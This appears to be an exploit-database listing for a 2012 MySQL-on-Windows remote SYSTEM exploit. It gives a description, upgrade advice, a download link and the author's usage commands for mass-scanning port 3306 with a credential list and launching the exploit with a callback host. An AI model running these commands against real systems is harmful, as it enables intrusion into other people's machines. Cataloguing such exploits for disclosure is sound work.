header-logo
Suggest Exploit
vendor:
MySQL Server for Windows
by:
Kingcope
9,3
CVSS
HIGH
Remote SYSTEM Level Exploit
N/A
CWE
Product Name: MySQL Server for Windows
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit

This exploit allows an attacker to gain SYSTEM level access to a Windows machine running a vulnerable version of MySQL Server. The attacker can use the pnscan tool to scan for vulnerable MySQL servers and the mysql_win_remote.pl tool to exploit the vulnerability. The accounts file holds the user/password combinations to try and the hits are saved in the jack.pot file.

Mitigation:

Upgrade to the latest version of MySQL Server for Windows.
Source

Exploit-DB raw data:

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23083.zip

use this on a fast scan server!

How to use.
pnscan:

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 192.168.0.0/16 3306

exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

user root on windows will mostly succeed.

/Kingcope

Navigation

Suggest Exploit

Services By CQR